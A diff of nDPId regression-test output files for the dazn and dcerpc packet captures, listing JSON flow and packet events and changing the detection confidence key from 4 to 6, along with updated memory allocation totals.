01161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1653830640634,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1653830640634,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI51TpAAEAGn17AqAGADeL0G7PUAbsidLdmXo6Hq4AYAfYzVAAAAQEICu1trZ1xJyp5FgMBAgABAAH8AwNgo6eggHfe+PBZNxxz2f+Nts8It8o3t3RyfFY+U+8s3iC6XQSkJJt5cWG68Q2AWVjlm2pyKfMq4VXHQ5nXKhlFIwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAfAB0AABp1c2VyLXByb2ZpbGUuYXIuaW5kYXpuLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDBldI46Te7dQq3VD7W+6azi6DI\/x3CzXEMlx+YJs8PCwAXAEEEQNzV3U7NxlwdMnUehbZejtqtCZtaP2SJSRszCqNnAwH+g3rcgl4s+kaLRhv1lRSxAtta1rthAruCkIpXtKVXxQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQB8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830640613,"flow_last_seen":1653830640634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830640634,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"user-profile.ar.indazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830640613,"flow_last_seen":1653830640651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830640651,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"user-profile.ar.indazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830640613,"flow_last_seen":1653830640634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830640634,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"user-profile.ar.indazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830640613,"flow_last_seen":1653830640651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830640651,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"user-profile.ar.indazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1653830641480,"flow_last_seen":1653830641480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1653830641480,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1653830641480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830641480,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA85BtAAEAGknfAqAGADeL0Hp+yAbsjfBE0AAAAAKAC+vA8bQAAAgQFtAQCCAp3jv7MAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1653830641499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830641499,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8XjkAAPQGpFkN4vQewKgBgAG7n7LhtoguI3wRNaAS\/\/8VuQAAAgQFoAQCCArbVdxqd47+zAEDAwk="} 01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1653830641501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1653830641501,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI55B1AAEAGkHjAqAGADeL0Hp+yAbsjfBE14baIL4AYAfZN2QAAAQEICneO\/uHbVdxqFgMBAgABAAH8AwP2xFVrrUUvT7baclvRUkGIqabLtROHVCH1j8n+tyIQOSBQFGnUgcb1RPrURqFyxAWNNtynXG\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"} 
-00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830641480,"flow_last_seen":1653830641501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830641501,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"subscriptions-service.dazn-api.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830641480,"flow_last_seen":1653830641520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"subscriptions-service.dazn-api.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830640613,"flow_last_seen":1653830640651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830614885,"flow_last_seen":1653830614920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830641480,"flow_last_seen":1653830641520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830641480,"flow_last_seen":1653830641501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830641501,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"subscriptions-service.dazn-api.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830641480,"flow_last_seen":1653830641520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"subscriptions-service.dazn-api.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830640613,"flow_last_seen":1653830640651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830614885,"flow_last_seen":1653830614920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830641480,"flow_last_seen":1653830641520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":5835,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1653830641520} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 @@ -30,9 +30,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878139 bytes -~~ total memory freed........: 5878139 bytes -~~ total allocations/frees...: 118143/118143 +~~ total memory allocated....: 6011773 bytes +~~ total memory freed........: 6011773 bytes +~~ total allocations/frees...: 120905/120905 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1167 chars diff --git a/test/results/dcerpc.pcap.out b/test/results/dcerpc.pcap.out index 02fd292a0..238f24178 100644 --- a/test/results/dcerpc.pcap.out +++ b/test/results/dcerpc.pcap.out 
@@ -2,26 +2,26 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1602860709979} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709979,"flow_last_seen":1602860709979,"flow_idle_time":200000,"flow_min_l4_payload_len":642,"flow_max_l4_payload_len":642,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":642,"midstream":0,"thread_ts_msec":1602860709979,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1602860709979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":684,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":684,"pkt_l4_len":650,"thread_ts_msec":1602860709979,"pkt":"AA7wSJ4FABwGCybtCABFAAKeAX4AAB4RFWLAqAELwKgBFMADiJQCip8cBAAgAAAAAADeoAAAbJcR0YJxAAEBAQFN3qAAAWyXEdGCcQCgJELffTX9qQA1ihISgAQAHAYLJu0AAAAAAAAAAQAAAAAAAP\/\/\/\/8CMgAAAAAAAAMtAAACHgAAAy0AAAAAAAACHgEBAEQBAAABCfGlMMdfbUe2f4BzQ53qrQACABwGCybt3qAAAGyXEdGCcQBkAQ0AKgAAABECWIiSAA5wbGN4YmtvbnRyNzRiNwECAGgBAAABAAGIkgAAAAIAKIAAACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAcAAAABAAAAAIAAAAEAAIABAAIAAIACAAMAAQABAAQAAgABAAYAAwABAAkAAgACAAEACAAEAAEACwECAGgBAAACAAKIkgAAAAIAKIAQACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAIAAgABAAYABAABAAkABwAAAAEAAAAAgAAAAQAAgAEAAgAAgAIAAwABAAEABAACAAEABQADAAEACAEEAEoBAAABAAAAAAAAAAAEBgAAAAQAAQAAAAEAAAABAAABAYAAAAAAAgAAAAEAAAEBgAEAAAADAAAAAQAAAQGAAgAAAAMAAAABAAABAQEEACABAAABAAAAAAABAQAA2AAAAAEAAQAAAAEAAQABAAEBAQEEACYBAAABAAAAAAACCAgABAAAAAEAAQAAAAEAAwABAAEBAQACAAEBAQEEACABAAABAAAAAAADCAAAAgAAAAEAAQAAAAEAAQABAAEBAQEEACABAAABAAAAAAAEAAgAUgAAAAEAAQAAAAEAAgACAAEBAQEDABYBAAABiJIAAAAAAAEAAwAAAQDAAKAA"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709979,"flow_last_seen":1602860709979,"flow_idle_time":200000,"flow_min_l4_payload_len":642,"flow_max_l4_payload_len":642,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":642,"midstream":0,"thread_ts_msec":1602860709979,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709979,"flow_last_seen":1602860709979,"flow_idle_time":200000,"flow_min_l4_payload_len":642,"flow_max_l4_payload_len":642,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":642,"midstream":0,"thread_ts_msec":1602860709979,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 01303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1602860709979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":684,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":684,"pkt_l4_len":650,"thread_ts_msec":1602860709979,"pkt":"AA7wSJ4FABwGCybtCABFAAKeAX4AAB4RFWLAqAELwKgBFMADiJQCip8cBAAgAAAAAADeoAAAbJcR0YJxAAEBAQFN3qAAAWyXEdGCcQCgJELffTX9qQA1ihISgAQAHAYLJu0AAAAAAAAAAQAAAAAAAP\/\/\/\/8CMgAAAAAAAAMtAAACHgAAAy0AAAAAAAACHgEBAEQBAAABCfGlMMdfbUe2f4BzQ53qrQACABwGCybt3qAAAGyXEdGCcQBkAQ0AKgAAABECWIiSAA5wbGN4YmtvbnRyNzRiNwECAGgBAAABAAGIkgAAAAIAKIAAACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAcAAAABAAAAAIAAAAEAAIABAAIAAIACAAMAAQABAAQAAgABAAYAAwABAAkAAgACAAEACAAEAAEACwECAGgBAAACAAKIkgAAAAIAKIAQACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAIAAgABAAYABAABAAkABwAAAAEAAAAAgAAAAQAAgAEAAgAAgAIAAwABAAEABAACAAEABQADAAEACAEEAEoBAAABAAAAAAAAAAAEBgAAAAQAAQAAAAEAAAABAAABAYAAAAAAAgAAAAEAAAEBgAEAAAADAAAAAQAAAQGAAgAAAAMAAAABAAABAQEEACABAAABAAAAAAABAQAA2AAAAAEAAQAAAAEAAQABAAEBAQEEACYBAAABAAAAAAACCAgABAAAAAEAAQAAAAEAAwABAAEBAQACAAEBAQEEACABAAABAAAAAAADCAAAAgAAAAEAAQAAAAEAAQABAAEBAQEEACABAAABAAAAAAAEAAgAUgAAAAEAAQAAAAEAAgACAAEBAQEDABYBAAABiJIAAAAAAAEAAwAAAQDAAKAA"} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709993,"flow_last_seen":1602860709993,"flow_idle_time":200000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1602860709993,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1602860709993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1602860709993,"pkt":"ABwGCybtAA7wSJ4FCABFAADGAAUAAB4RGLPAqAEUwKgBC8AJwAMAsvR9BAIKABAAAAAAAKDel2zREYJxAAEBAQFNAQCg3pds0RGCcQCgJELffQCp\/TWKNRISgAQAHAYLJu0AAAAAAQAAAAAAAAAAAP\/\/\/\/9aAAAAAAAAAAAARgAAAC0DAAAAAAAARgAAAIEBAB4BAAABCfGlMMdfbUe2f4BzQ53qrQACAA7wSJ4FiJKBAgAIAQAAAQABgACBAgAIAQAAAgACgBCBAwAIAQAAAQAUBZg="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709993,"flow_last_seen":1602860709993,"flow_idle_time":200000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1602860709993,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709993,"flow_last_seen":1602860709993,"flow_idle_time":200000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1602860709993,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1602860709993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1602860709993,"pkt":"ABwGCybtAA7wSJ4FCABFAADGAAUAAB4RGLPAqAEUwKgBC8AJwAMAsvR9BAIKABAAAAAAAKDel2zREYJxAAEBAQFNAQCg3pds0RGCcQCgJELffQCp\/TWKNRISgAQAHAYLJu0AAAAAAQAAAAAAAAAAAP\/\/\/\/9aAAAAAAAAAAAARgAAAC0DAAAAAAAARgAAAIEBAB4BAAABCfGlMMdfbUe2f4BzQ53qrQACAA7wSJ4FiJKBAgAIAQAAAQABgACBAgAIAQAAAgACgBCBAwAIAQAAAQAUBZg="} 
